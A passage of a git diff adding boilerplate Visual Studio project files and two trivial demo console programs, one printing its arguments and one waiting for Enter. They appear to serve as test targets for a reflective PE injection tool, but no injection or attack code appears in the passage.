<PropertyGroup Label="Globals"> + <ProjectGuid>{F674A5CE-F75F-4035-90AB-46DEBC670282}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>DemoExe_MD</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="DemoExe_MD.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters new file mode 100644 index 0000000..2048201 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters @@ -0,0 +1,36 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="DemoExe_MD.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt new file mode 100644 index 0000000..0259e3e --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt @@ -0,0 +1,40 @@ +======================================================================== + CONSOLE APPLICATION : DemoExe_MD Project Overview +======================================================================== + +AppWizard has created this DemoExe_MD application for you. + +This file contains a summary of what you will find in each of the files that +make up your DemoExe_MD application. + + +DemoExe_MD.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +DemoExe_MD.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +DemoExe_MD.cpp + This is the main application source file. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named DemoExe_MD.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp new file mode 100644 index 0000000..487dd86 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// DemoExe_MD.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h new file mode 100644 index 0000000..b005a83 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <stdio.h> +#include <tchar.h> + + + +// TODO: reference additional headers your program requires here diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp new file mode 100644 index 0000000..364340b --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp @@ -0,0 +1,26 @@ +// DemoExe.cpp : Defines the entry point for the console application. +// + +#include "stdafx.h" +#include <iostream> + +using namespace std; + +int _tmain(int argc, _TCHAR* argv[]) +{ + printf("Exe loaded! Printing argc and argv\n\n"); + + printf("Argc: %d\n", argc); + printf("ArgvAddress: %d\n", argv); + + for (int i = 0; i < argc; i++) + { + wprintf(L"Argv: %s\n", argv[i]); + } + + printf("Exiting exe\n"); + + return 0; +} + + diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj new file mode 100644 index 0000000..1343ba7 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj @@ -0,0 +1,160 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>DemoExe_MDd</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="DemoExe_MDd.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters new file mode 100644 index 0000000..c376aad --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters @@ -0,0 +1,36 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="DemoExe_MDd.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt new file mode 100644 index 0000000..63eddea --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt @@ -0,0 +1,40 @@ +======================================================================== + CONSOLE APPLICATION : DemoExe_MDd Project Overview +======================================================================== + +AppWizard has created this DemoExe_MDd application for you. + +This file contains a summary of what you will find in each of the files that +make up your DemoExe_MDd application. + + +DemoExe_MDd.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +DemoExe_MDd.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +DemoExe_MDd.cpp + This is the main application source file. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp new file mode 100644 index 0000000..bd57b62 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// DemoExe_MDd.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h new file mode 100644 index 0000000..b005a83 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <stdio.h> +#include <tchar.h> + + + +// TODO: reference additional headers your program requires here diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln new file mode 100644 index 0000000..864683a --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32 + {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32 + {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32 + {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp new file mode 100644 index 0000000..c19541b --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp @@ -0,0 +1,16 @@ +// ExeToInjectInTo.cpp : Defines the entry point for the console application. +// + +#include "stdafx.h" +#include <stdio.h> + +using namespace std; + +int _tmain(int argc, _TCHAR* argv[]) +{ + printf("Press enter to close.\n"); + getchar(); + + return 0; +} + diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj new file mode 100644 index 0000000..dd3e57d --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj @@ -0,0 +1,95 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}</ProjectGuid> + 